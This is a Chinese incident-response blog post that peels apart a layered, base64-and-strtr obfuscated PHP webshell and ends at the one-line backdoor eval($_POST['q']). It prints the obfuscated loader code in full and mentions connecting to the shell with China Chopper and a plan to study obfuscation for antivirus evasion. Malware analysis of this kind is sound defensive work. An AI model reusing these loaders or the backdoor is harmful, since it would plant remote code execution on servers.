QV2zxq3R9MWFYBqH/MZ==";
eval('?>'.base64_decode($strtr(substr($AMqYfN,52*2),substr($AMqYfN,52,52),substr($AMqYfN,0,52))));
?>

现在这里就剩下一个变量——$xGCfol了,我们可以尝试直接echo一下,注意这里我们需要使用一个htmlspecialchars进行一次实体编码处理,不然直接访问就执行了

<?php 
$AMqYfN="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";
echo htmlspecialchars(('?>'.base64_decode(strtr(substr($AMqYfN,52*2),substr($AMqYfN,52,52),substr($AMqYfN,0,52)))));
?>

随后得到如下结果:

?><?php define('BkzWLZ0717',HLPHNk0717);$tcKeYa=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZFlrdEJ6bkNnaXF1WlhLSWJtdk1qVkRUb1NMRlFleU9QcFJock5XeGZ3QUdFVWFKSGNzbA==");$piaGCV=$tcKeYa[3].$tcKeYa[6].$tcKeYa[33].$tcKeYa[30];$pZYgqf=$tcKeYa[33].$tcKeYa[10].$tcKeYa[24].$tcKeYa[10].$tcKeYa[24];$okaega=$pZYgqf[0].$tcKeYa[18].$tcKeYa[3].$pZYgqf[0].$pZYgqf[1].$tcKeYa[24];$wIzynf=$tcKeYa[7].$tcKeYa[13];$piaGCV.=$tcKeYa[22].$tcKeYa[36].$tcKeYa[29].$tcKeYa[26].$tcKeYa[30].$tcKeYa[32].$tcKeYa[35].$tcKeYa[26].$tcKeYa[30];eval($piaGCV("JHRxc2lUYz0iS0R4Y1ZFb3NiQWZ2V0hkdElTQm5QcVlHWlRRWGFDTXVPbWx6cHlraWhMZ2pOckZ3VUplUmhQaVp4UWRsRU9VSW51a0RnWU1YTlJjanZwcUJKZmFTeUdIYkF6c2V3ckxLQ1dtVFZGb3ROUDlUSnVPTE5iND0iO2V2YWwoJz8+Jy4kcGlhR0NWKCRwWllncWYoJG9rYWVnYSgkdHFzaVRjLCR3SXp5bmYqMiksJG9rYWVnYSgkdHFzaVRjLCR3SXp5bmYsJHdJenluZiksJG9rYWVnYSgkdHFzaVRjLDAsJHdJenluZikpKSk7"));?><?php define('jrTtpv0717',HLPHNk0717);$fLDUZD=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZG5xWGd4S0Z0d3BEU0pQc3lsalRWSFprR2hMb2VDRXZPZmlyWWJCTkFVdWNJYVJNeldRbQ==");$ysCLHC=$fLDUZD[3].$fLDUZD[6].$fLDUZD[33].$fLDUZD[30];$ICOlFs=$fLDUZD[33].$fLDUZD[10].$fLDUZD[24].$fLDUZD[10].$fLDUZD[24];$ZMKzMl=$ICOlFs[0].$fLDUZD[18].$fLDUZD[3].$ICOlFs[0].$ICOlFs[1].$fLDUZD[24];$OHnPgK=$fLDUZD[7].$fLDUZD[13];$ysCLHC.=$fLDUZD[22].$fLDUZD[36].$fLDUZD[29].$fLDUZD[26].$fLDUZD[30].$fLDUZD[32].$fLDUZD[35].$fLDUZD[26].$fLDUZD[30];eval($ysCLHC("JHh0S1lRYT0ib1lwTlR4WEJSQUVGUGZNVlFiWmpxbmV3SGlXdkpDeXRoZ2RMT0dyYXpJRGt1bFNVc2NtS1VqaWxmWk5xTHlBZ1NNZUd1UURWd1JzQnB2Y0tUYlB0SFlkRW1JckZYYWhKa294ekNXbk9TaDlCRnB5bGJuRzJqY0JVVGc5dWYxbHpjUGRaVDEwaW1CME9TWDQ9IjtldmFsKCc/PicuJHlzQ0xIQygkSUNPbEZzKCRaTUt6TWwoJHh0S1lRYSwkT0huUGdLKjIpLCRaTUt6TWwoJHh0S1lRYSwkT0huUGdLLCRPSG5QZ0spLCRaTUt6TWwoJHh0S1lRYSwwLCRPSG5QZ0spKSkpOw=="));?>

格式化一下之后得到如下结果:

<?php 
define('BkzWLZ0717',HLPHNk0717);
$tcKeYa=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZFlrdEJ6bkNnaXF1WlhLSWJtdk1qVkRUb1NMRlFleU9QcFJock5XeGZ3QUdFVWFKSGNzbA==");
$piaGCV=$tcKeYa[3].$tcKeYa[6].$tcKeYa[33].$tcKeYa[30];
$pZYgqf=$tcKeYa[33].$tcKeYa[10].$tcKeYa[24].$tcKeYa[10].$tcKeYa[24];
$okaega=$pZYgqf[0].$tcKeYa[18].$tcKeYa[3].$pZYgqf[0].$pZYgqf[1].$tcKeYa[24];
$wIzynf=$tcKeYa[7].$tcKeYa[13];
$piaGCV.=$tcKeYa[22].$tcKeYa[36].$tcKeYa[29].$tcKeYa[26].$tcKeYa[30].$tcKeYa[32].$tcKeYa[35].$tcKeYa[26].$tcKeYa[30];
eval($piaGCV("JHRxc2lUYz0iS0R4Y1ZFb3NiQWZ2V0hkdElTQm5QcVlHWlRRWGFDTXVPbWx6cHlraWhMZ2pOckZ3VUplUmhQaVp4UWRsRU9VSW51a0RnWU1YTlJjanZwcUJKZmFTeUdIYkF6c2V3ckxLQ1dtVFZGb3ROUDlUSnVPTE5iND0iO2V2YWwoJz8+Jy4kcGlhR0NWKCRwWllncWYoJG9rYWVnYSgkdHFzaVRjLCR3SXp5bmYqMiksJG9rYWVnYSgkdHFzaVRjLCR3SXp5bmYsJHdJenluZiksJG9rYWVnYSgkdHFzaVRjLDAsJHdJenluZikpKSk7"));
?>
<?
php 
define('jrTtpv0717',HLPHNk0717);
$fLDUZD=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZG5xWGd4S0Z0d3BEU0pQc3lsalRWSFprR2hMb2VDRXZPZmlyWWJCTkFVdWNJYVJNeldRbQ==");
$ysCLHC=$fLDUZD[3].$fLDUZD[6].$fLDUZD[33].$fLDUZD[30];
$ICOlFs=$fLDUZD[33].$fLDUZD[10].$fLDUZD[24].$fLDUZD[10].$fLDUZD[24];
$ZMKzMl=$ICOlFs[0].$fLDUZD[18].$fLDUZD[3].$ICOlFs[0].$ICOlFs[1].$fLDUZD[24];
$OHnPgK=$fLDUZD[7].$fLDUZD[13];
$ysCLHC.=$fLDUZD[22].$fLDUZD[36].$fLDUZD[29].$fLDUZD[26].$fLDUZD[30].$fLDUZD[32].$fLDUZD[35].$fLDUZD[26].$fLDUZD[30];
eval($ysCLHC("JHh0S1lRYT0ib1lwTlR4WEJSQUVGUGZNVlFiWmpxbmV3SGlXdkpDeXRoZ2RMT0dyYXpJRGt1bFNVc2NtS1VqaWxmWk5xTHlBZ1NNZUd1UURWd1JzQnB2Y0tUYlB0SFlkRW1JckZYYWhKa294ekNXbk9TaDlCRnB5bGJuRzJqY0JVVGc5dWYxbHpjUGRaVDEwaW1CME9TWDQ9IjtldmFsKCc/PicuJHlzQ0xIQygkSUNPbEZzKCRaTUt6TWwoJHh0S1lRYSwkT0huUGdLKjIpLCRaTUt6TWwoJHh0S1lRYSwkT0huUGdLLCRPSG5QZ0spLCRaTUt6TWwoJHh0S1lRYSwwLCRPSG5QZ0spKSkpOw=="));
?>

咦,格式化之后发现竟然又变得复杂了,不慌,我们再次进行eval到echo的替换操作并将关键得随机变量名称进行一次输出:

<?php 
define('BkzWLZ0717',HLPHNk0717);
$tcKeYa=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZFlrdEJ6bkNnaXF1WlhLSWJtdk1qVkRUb1NMRlFleU9QcFJock5XeGZ3QUdFVWFKSGNzbA==");
$piaGCV=$tcKeYa[3].$tcKeYa[6].$tcKeYa[33].$tcKeYa[30];
$pZYgqf=$tcKeYa[33].$tcKeYa[10].$tcKeYa[24].$tcKeYa[10].$tcKeYa[24];
$okaega=$pZYgqf[0].$tcKeYa[18].$tcKeYa[3].$pZYgqf[0].$pZYgqf[1].$tcKeYa[24];
$wIzynf=$tcKeYa[7].$tcKeYa[13];
$piaGCV.=$tcKeYa[22].$tcKeYa[36].$tcKeYa[29].$tcKeYa[26].$tcKeYa[30].$tcKeYa[32].$tcKeYa[35].$tcKeYa[26].$tcKeYa[30];
echo $piaGCV.'<br>';
echo $pZYgqf.'<br>';
echo $okaega.'<br>';
echo $wIzynf.'<br>';
echo htmlentities(($piaGCV("JHRxc2lUYz0iS0R4Y1ZFb3NiQWZ2V0hkdElTQm5QcVlHWlRRWGFDTXVPbWx6cHlraWhMZ2pOckZ3VUplUmhQaVp4UWRsRU9VSW51a0RnWU1YTlJjanZwcUJKZmFTeUdIYkF6c2V3ckxLQ1dtVFZGb3ROUDlUSnVPTE5iND0iO2V2YWwoJz8+Jy4kcGlhR0NWKCRwWllncWYoJG9rYWVnYSgkdHFzaVRjLCR3SXp5bmYqMiksJG9rYWVnYSgkdHFzaVRjLCR3SXp5bmYsJHdJenluZiksJG9rYWVnYSgkdHFzaVRjLDAsJHdJenluZikpKSk7")));
?>
<?php 
define('jrTtpv0717',HLPHNk0717);
$fLDUZD=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZG5xWGd4S0Z0d3BEU0pQc3lsalRWSFprR2hMb2VDRXZPZmlyWWJCTkFVdWNJYVJNeldRbQ==");
$ysCLHC=$fLDUZD[3].$fLDUZD[6].$fLDUZD[33].$fLDUZD[30];
$ICOlFs=$fLDUZD[33].$fLDUZD[10].$fLDUZD[24].$fLDUZD[10].$fLDUZD[24];
$ZMKzMl=$ICOlFs[0].$fLDUZD[18].$fLDUZD[3].$ICOlFs[0].$ICOlFs[1].$fLDUZD[24];
$OHnPgK=$fLDUZD[7].$fLDUZD[13];
$ysCLHC.=$fLDUZD[22].$fLDUZD[36].$fLDUZD[29].$fLDUZD[26].$fLDUZD[30].$fLDUZD[32].$fLDUZD[35].$fLDUZD[26].$fLDUZD[30];
echo $fLDUZD.'<br>';
echo $ysCLHC.'<br>';
echo $ICOlFs.'<br>';
echo $ZMKzMl.'<br>';
echo $OHnPgK.'<br>';
echo $ysCLHC.'<br>';
echo htmlentities(($ysCLHC("JHh0S1lRYT0ib1lwTlR4WEJSQUVGUGZNVlFiWmpxbmV3SGlXdkpDeXRoZ2RMT0dyYXpJRGt1bFNVc2NtS1VqaWxmWk5xTHlBZ1NNZUd1UURWd1JzQnB2Y0tUYlB0SFlkRW1JckZYYWhKa294ekNXbk9TaDlCRnB5bGJuRzJqY0JVVGc5dWYxbHpjUGRaVDEwaW1CME9TWDQ9IjtldmFsKCc/PicuJHlzQ0xIQygkSUNPbEZzKCRaTUt6TWwoJHh0S1lRYSwkT0huUGdLKjIpLCRaTUt6TWwoJHh0S1lRYSwkT0huUGdLLCRPSG5QZ0spLCRaTUt6TWwoJHh0S1lRYSwwLCRPSG5QZ0spKSkpOw==")));
?>

执行结果如下所示:

我去,好无情,竟然还来....,由上面可得到如下对标内容:

echo $piaGCV.'<br>';        base64_decode
echo $pZYgqf.'<br>';        strtr
echo $okaega.'<br>';        substr
echo $wIzynf.'<br>';        52echo $ysCLHC.'<br>';        base64_decode
echo $ICOlFs.'<br>';        strtr
echo $ZMKzMl.'<br>';        substr
echo $OHnPgK.'<br>';        52
echo $ysCLHC.'<br>';        base64_decode

紧接着我们再对上面的内容中的变量进行替换得到如下的结果:

<?php
$tqsiTc="KDxcVEosbAfvWHdtISBnPqYGZTQXaCMuOmlzpykihLgjNrFwUJeRhPiZxQdlEOUInukDgYMXNRcjvpqBJfaSyGHbAzsewrLKCWmTVFotNP9TJuOLNb4=";
eval('?>'.base64_decode(strtr(substr($tqsiTc,52*2),substr($tqsiTc,52,52),substr($tqsiTc,0,52))));
$xtKYQa="oYpNTxXBRAEFPfMVQbZjqnewHiWvJCythgdLOGrazIDkulSUscmKUjilfZNqLyAgSMeGuQDVwRsBpvcKTbPtHYdEmIrFXahJkoxzCWnOSh9BFpylbnG2jcBUTg9uf1lzcPdZT10imB0OSX4=";
eval('?>'.base64_decode(strtr(substr($xtKYQa,52*2),substr($xtKYQa,52,52),substr($xtKYQa,0,52))));
?>

随后我们直接将上面eval改echo并结合htmlentities进行输出:

<?php
$tqsiTc="KDxcVEosbAfvWHdtISBnPqYGZTQXaCMuOmlzpykihLgjNrFwUJeRhPiZxQdlEOUInukDgYMXNRcjvpqBJfaSyGHbAzsewrLKCWmTVFotNP9TJuOLNb4=";
echo htmlentities(('?>'.base64_decode(strtr(substr($tqsiTc,52*2),substr($tqsiTc,52,52),substr($tqsiTc,0,52)))));
$xtKYQa="oYpNTxXBRAEFPfMVQbZjqnewHiWvJCythgdLOGrazIDkulSUscmKUjilfZNqLyAgSMeGuQDVwRsBpvcKTbPtHYdEmIrFXahJkoxzCWnOSh9BFpylbnG2jcBUTg9uf1lzcPdZT10imB0OSX4=";
echo htmlentities(('?>'.base64_decode(strtr(substr($xtKYQa,52*2),substr($xtKYQa,52,52),substr($xtKYQa,0,52)))));
?>

执行结果如下所示:

最后得这个结果属实有点小离谱???一大串变一句话???

<?php eval($_POST['q']); ?>

内容证实为一句话木马,连接密码为q,随后我们使用菜刀连接源webshell,成功交差

文末小结

本篇文章的起源主要是因为客户的需求也是因为个人的好奇心驱动,其中主要介绍了对应急响应过程中编码混淆的webshell进行层层解码获取webshell连接密码的过程,之前曾写过的webshell免杀实践文章中主要的免杀思路在于借助PHP语言的特性以及函数来实现,感觉后面可以深入再分析一下关于PHP源码混淆加密处理在webshell免杀中的应用,感觉这个在大马文件中应该极为合适,先在这里挖个坑,后面来填~

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/48420.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

fMATLAB中fill函数填充不同区域

只需获取填充区域的边缘信息&#xff0c;函数边缘越详细越好&#xff0c;然后调用fill函数。 fill函数能够根据指定的顶点坐标和填充颜色来绘制多边形或曲线形状&#xff0c;并在其内部填充指定的颜色。这使得在MATLAB中创建具有视觉吸引力的图形变得简单而高效。 fill函数的…

《0基础》学习Python——第二十讲__网路爬虫/<3>

一、用post请求爬取网页 同样与上一节课的get强求的内容差不多&#xff0c;即将requests.get(url,headershead)代码更换成requests.post(url,headershead),其余的即打印获取的内容&#xff0c;如果content-typejson类型的&#xff0c;打印上述代码的请求&#xff0c;则用一个命…

笔记:现代卷积神经网络之VGG

本文为李沐老师《动手学深度学习》笔记小结&#xff0c;用于个人复习并记录学习历程&#xff0c;适用于初学者 神经网络架构设计的模块化 然AlexNet证明深层神经网络卓有成效&#xff0c;但它没有提供一个通用的模板来指导后续的研究人员设计新的网络。 在下面的几个章节中&a…

【Vue】`v-if` 指令详解:条件渲染的高效实现

文章目录 一、v-if 指令概述二、v-if 的基本用法1. 基本用法2. 使用 v-else3. 使用 v-else-if 三、v-if 指令的高级用法1. 与 v-for 一起使用2. v-if 的性能优化 四、v-if 的常见应用场景1. 表单验证2. 弹窗控制 五、v-if 指令的注意事项 Vue.js 是一个用于构建用户界面的渐进式…

Flink调优详解:案例解析(第42天)

系列文章目录 一、Flink-任务参数配置 二、Flink-SQL调优 三、阿里云Flink调优 文章目录 系列文章目录前言一、Flink-任务参数配置1.1 运行时参数1.2 优化器参数1.3 表参数 二、Flink-SQL调优2.1 mini-batch聚合2.2 两阶段聚合2.3 分桶2.4 filter去重&#xff08;了解&#xf…

【中项】系统集成项目管理工程师-第3章 信息技术服务-3.4服务标准化

前言&#xff1a;系统集成项目管理工程师专业&#xff0c;现分享一些教材知识点。觉得文章还不错的喜欢点赞收藏的同时帮忙点点关注。 软考同样是国家人社部和工信部组织的国家级考试&#xff0c;全称为“全国计算机与软件专业技术资格&#xff08;水平&#xff09;考试”&…

持续集成02--Linux环境更新/安装Java新版本

前言 在持续集成/持续部署&#xff08;CI/CD&#xff09;的旅程中&#xff0c;确保开发环境的一致性至关重要。本篇“持续集成02--Linux环境更新/安装Java新版本”将聚焦于如何在Linux环境下高效地更新或安装Java新版本。Java作为广泛应用的编程语言&#xff0c;其版本的更新对…

XLua原理(一)

项目中活动都是用xlua开发的&#xff0c;项目周更热修也是用xlua的hotfix特性来做的。现研究底层原理&#xff0c;对于项目性能有个更好的把控。 本文认为看到该文章的人已具备使用xlua开发的能力&#xff0c;只研究介绍下xlua的底层实现原理。 一.lua和c#交互原理 概括&…

用程序画出三角形图案

创建各类三角形图案 直角三角形&#xff08;左下角&#xff09; #include <iostream> using namespace std;int main() {int rows;cout << "输入行数: ";cin >> rows;for(int i 1; i < rows; i){for(int j 1; j < i; j){cout << &…

003uboot目录分析和两个阶段

我们都知道s3c2440是一个soc&#xff0c;内含cpu和各种控制器、片内的RAM&#xff0c;他的CPU是arm920t。 我们先来分析一下uboot原码的各个目录 1.uboot目录分析 board&#xff1a;board里存放的是支持各个开发板的文件&#xff0c;包括链接脚本 common: common目录中存放的…

graham 算法计算平面投影点集的凸包

文章目录 向量的内积&#xff08;点乘&#xff09;、外积&#xff08;叉乘&#xff09;确定旋转方向numpy 的 cross 和 outernp.inner 向量与矩阵计算示例np.outer 向量与矩阵计算示例 python 示例生成样例散点数据图显示按极角排序的结果根据排序点计算向量转向并连成凸包 基本…

set、map、multiset、multimap容器介绍和常用接口使用

文章目录 前言一、set容器二、multiset三、map四、multimap 前言 1、set、map、 multiset、 multimap都是基于红黑树实现的容器。 2、set、multiset都使用头文件#include<set>,map、multimap都是使用头文件#include<map> 一、set容器 1、set容器的介绍 C标准库中的…

pytest常用命令行参数解析

简介&#xff1a;pytest作为一个成熟的测试框架&#xff0c;它提供了许多命令行参数来控制测试的运行方式&#xff0c;以配合适用于不同的测试场景。例如 -x 可以用于希望出现错误就停止&#xff0c;以便定位和分析问题。–rerunsnum适用于希望进行失败重跑等个性化测试策略。 …

【BUG】已解决:AttributeError: ‘str‘ object has no attribute ‘get‘

已解决&#xff1a;AttributeError: ‘str‘ object has no attribute ‘get‘ 欢迎来到英杰社区https://bbs.csdn.net/topics/617804998 欢迎来到我的主页&#xff0c;我是博主英杰&#xff0c;211科班出身&#xff0c;就职于医疗科技公司&#xff0c;热衷分享知识&#xff0c…

C++初学者指南-5.标准库(第一部分)--标准库查找算法

C初学者指南-5.标准库(第一部分)–标准库查找算法 文章目录 C初学者指南-5.标准库(第一部分)--标准库查找算法查找/定位一个元素findfind_iffind_if_notfind_last / find_last_if / find_last_if_notfind_first_of 查找范围内的子范围 search find_endstarts_withends_with 找到…

SpringBoot3 + Vue3 学习 Day 2

登入接口 和 获取用户详细信息的开发 学习视频登入接口的开发1、登入主逻辑2、登入认证jwt 介绍生成 JWT① 导入依赖② 编写代码③ 验证JWT 登入认证接口的实现① 导入 工具类② controller 类实现③ 存在的问题及优化① 编写拦截器② 注册拦截器③ 其他接口直接提供服务 获取用…

Web3D:WebGL为什么在渲染性能上输给了WebGPU。

WebGL已经成为了web3D的标配&#xff0c;市面上有N多基于webGL的3D引擎&#xff0c;WebGPU作为挑战者&#xff0c;在渲染性能上确实改过webGL一头&#xff0c;由于起步较晚&#xff0c;想通过这个优势加持&#xff0c;赶上并超越webGL仍需时日。 贝格前端工场为大家分享一下这…

Webstorm-恢复默认UI布局

背景 在使用Webstorm的时候,有时候进行个性化设置,如字体、界面布局等. 但是设置后的效果不理想,想要重新设置回原来的模样,却找不到设置项. 这里提供一种解决方案,恢复默认设置,即恢复到最初刚下载好后的设置. 操作步骤 步骤一:打开setting 步骤二:搜索Restore Default,找到…

数学建模-----SPSS参数检验和非参数检验

目录 1.参数检验 1.1独立样本t检验案例分析 1.1.1查看数据编号 1.1.2确定变量所属类型 1.1.3选项里面的置信区间 1.1.4对于结果进行分析 1.2配对样本t检验案例分析 1.2.1相关设置 1.2.2分析结果 2.非参数检验 2.1对比分析 2.2非参数检验的方法 2.3案例分析 2.3.1相…

10道JVM经典面试题

1、 JVM中&#xff0c;new出来的对象是在哪个区&#xff1f; 2、 说说类加载有哪些步骤&#xff1f; 3、 JMM是什么&#xff1f; 4、 说说JVM内存结构&#xff1f; 5、 MinorGC和FullGC有什么区别&#xff1f; 6、 什么是STW? 7、 什么情况下会发生堆/栈溢出&#xff1f…